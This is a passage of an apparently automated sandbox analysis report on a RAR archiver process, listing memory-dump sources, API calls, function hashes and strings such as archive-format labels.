• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction ID: 90a201e83333182167ec246a4488a8f786db7c764caa43583d2a1e39e59e7113
• Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction Fuzzy Hash: D3E02B20B3455147DBDD6B6DC891FAE5390AF84B80FC02037F40BC3A14ED1CC4558B10
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ErrorLanguagesLastPreferredRestoreThread
• String ID:
• API String ID: 588628887-0
• Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
• Instruction ID: 5e618428739e953e9972b4a3b85ffbb6a29967f8001ec85c930ce145c28cab5c
• Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
• Instruction Fuzzy Hash: 6DE08661E1964342FF4CBBFA540597D92916FD5B44FC45032D90D56251EE2C68434224
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94d7068a19ad0216400a77a98d180080cd48a491331cd68647dd32dbf453e6d1
• Instruction ID: 49b42d1408d4759089745d37c9d1825263ee71dd8d80405ad36ed2dcf55ba4ca
• Opcode Fuzzy Hash: 94d7068a19ad0216400a77a98d180080cd48a491331cd68647dd32dbf453e6d1
• Instruction Fuzzy Hash: B3E1E621A0868241FF28AA389454ABDA751EF81B89FC44537DE4D177DECE3DA447C731
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CommandLine
• String ID:
• API String ID: 3253501508-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CompareString
• String ID:
• API String ID: 1825529933-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _onexit
• String ID:
• API String ID: 572287377-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _onexit
• String ID:
• API String ID: 572287377-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction ID: a836c1f1f052c3b40246cf5e42fb15a7e62eeb0b0fd11282267a1dca5b885245
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction Fuzzy Hash: 1CC09B51E9D44BC1F59C77BD984687C41506BE4750FD05537D80EC17D1DD0C61D78630
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction ID: 70aa4aac5b22dae03a568e38496456a00717a4b0b5fd93a518be41d12bb23f7e
• Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction Fuzzy Hash: D6D05E69E1AD02C7F70CFB49E844F3C96617FD4799FC14636C40C44150CFACA0468360
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _onexit
• String ID:
• API String ID: 572287377-0
• Opcode ID: 912773467d3b3c5d449051a259f23f146562a37bc44ecb42320ce9d65bd6821d
• Instruction ID: 433b2be3e49827997c8eae6a08820c849a9943b9f4fd4b34667156e063bad166
• Opcode Fuzzy Hash: 912773467d3b3c5d449051a259f23f146562a37bc44ecb42320ce9d65bd6821d
• Instruction Fuzzy Hash: 65A01100EA200F82AA8832BA888A8B800800BA8320FE00A228808C0382CC0C00EB0A20
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E4549
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction ID: ffbd46a855c772c5440ceb178788d302a06cb17af4b988df4950d62e08612aaa
• Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction Fuzzy Hash: F0C09B66E0A48281D5487B6D985517C5111BF8573AFD41332D53E495F0CF5854EB4710
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7D7A049F4: LoadStringW.USER32 ref: 00007FF7D7A04A7B
  • Part of subcall function 00007FF7D7A049F4: LoadStringW.USER32 ref: 00007FF7D7A04A94
  • Part of subcall function 00007FF7D7A0B6D0: Sleep.KERNEL32(?,?,?,?,00007FF7D79DCBED,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D7A0B730
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E6CB0
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: LoadString$Sleepfflushswprintf
• String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
• API String ID: 668332963-4283793440
• Opcode ID: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
• Instruction ID: 40e81a44f2659fa0c676bc42ae6e82f6387a5fafbad0a9f25396888f8d18ded9
• Opcode Fuzzy Hash: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
• Instruction Fuzzy Hash: 3F22AF23A0D6C395EB24FB68D8444FDA7A1FB85348FC44037D68D076AADE6CE646C720
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32 ref: 00007FF7D79DD4A6
• CloseHandle.KERNEL32 ref: 00007FF7D79DD4B9
  • Part of subcall function 00007FF7D79DEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF73
  • Part of subcall function 00007FF7D79DEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF84
  • Part of subcall function 00007FF7D79DEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7D79DEFA7
  • Part of subcall function 00007FF7D79DEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D79DEFCA
  • Part of subcall function 00007FF7D79DEF50: GetLastError.KERNEL32 ref: 00007FF7D79DEFD4
  • Part of subcall function 00007FF7D79DEF50: CloseHandle.KERNEL32 ref: 00007FF7D79DEFE7
• CreateDirectoryW.KERNEL32 ref: 00007FF7D79DD4C6
• CreateFileW.KERNEL32 ref: 00007FF7D79DD64A
• DeviceIoControl.KERNEL32 ref: 00007FF7D79DD68B
• CloseHandle.KERNEL32 ref: 00007FF7D79DD69A
• GetLastError.KERNEL32 ref: 00007FF7D79DD6AD
• RemoveDirectoryW.KERNEL32 ref: 00007FF7D79DD6FA
• DeleteFileW.KERNEL32 ref: 00007FF7D79DD705
  • Part of subcall function 00007FF7D79E2310: FlushFileBuffers.KERNEL32 ref: 00007FF7D79E233E
  • Part of subcall function 00007FF7D79E2310: SetFileTime.KERNEL32 ref: 00007FF7D79E23DB
  • Part of subcall function 00007FF7D79E1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF7D79E1958
  • Part of subcall function 00007FF7D79E39E0: SetFileAttributesW.KERNEL32(?,00007FF7D79E34EE,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E3A0F
                                                                                                                                                                        • Part of subcall function 00007FF7D79E39E0: SetFileAttributesW.KERNEL32(?,00007FF7D79E34EE,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E3A3C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                      • API String ID: 2827264287-3508440684
                                                                                                                                                                      • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                      • Instruction ID: 6d8b9387ca755b81e7cbffd46adee73bdad67f6edb2c9526fca8c993f3518cd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 47D1BE26A0868796EB24AF64D8846FDA7A0FB40798FC44133DA5D476D9DF3CD507C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction ID: b9deda037ff1e3cd2f5375fb65b69833183dbe07c1ecc135a15fed3c75fa70af
• Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction Fuzzy Hash: EE21A131A2865282F798AB69A855B7FF261EBC5704FD05037D90E0A558CF3DD44A8720
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE2F7
  • Part of subcall function 00007FF7D79DEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF73
  • Part of subcall function 00007FF7D79DEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF84
  • Part of subcall function 00007FF7D79DEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7D79DEFA7
  • Part of subcall function 00007FF7D79DEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D79DEFCA
  • Part of subcall function 00007FF7D79DEF50: GetLastError.KERNEL32 ref: 00007FF7D79DEFD4
  • Part of subcall function 00007FF7D79DEF50: CloseHandle.KERNEL32 ref: 00007FF7D79DEFE7
